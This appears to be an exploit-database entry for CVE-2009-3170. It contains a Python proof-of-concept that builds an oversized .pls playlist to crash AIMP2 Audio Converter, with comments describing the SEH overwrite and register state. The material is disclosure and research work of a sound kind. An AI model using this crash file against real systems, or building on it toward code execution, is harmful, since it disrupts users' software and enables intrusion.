Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
AIMP2 Audio Converter <= 2.53b330 (.pls/.m3u) Unicode Crash PoC
2009-09-15 / 2009-09-16
Credit:
mr_me
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2009-3170
CWE:
CWE-119
Ogólna skala CVSS:
9.3/10
Znaczenie:
10/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Pełny
Wpływ na integralność:
Pełny
Wpływ na dostępność:
Pełny
#!/usr/bin/python # # ###################################################################### # # AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC # Found & exploited by: mr_me # Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip # Tested on: Wind0ws XP SP3 # # ###################################################################### # # Unicode overflow, maybe someone with better skills can exploit this # you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction. # Here is the crash breakdown: # # EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~ # ECX 00000273 # EDX 00000C4C # EBX 00000000 # ESP 0012DCA8 # EBP 0012DD64 # ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~ # EDI 00130000 ASCII "Actx " # EIP 004530C6 AIMP2.004530C6 # # And then when we pass the exemption handler to overwrite EIP... # # EIP 00410041 # header = ("[playlist]\nNumberOfEntries=3\n\n"); header += ("File1="); crash = ("\x41" * 5000); buffer = header + crash file=open('mr_mes_funky.pls','w') file.write(buffer) file.close() print "[+] mr_mes_funky.pls file created successfully"
Referencje:
http://www.vupen.com/english/advisories/2009/2530
http://www.milw0rm.com/exploits/9561
http://secunia.com/advisories/35295
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top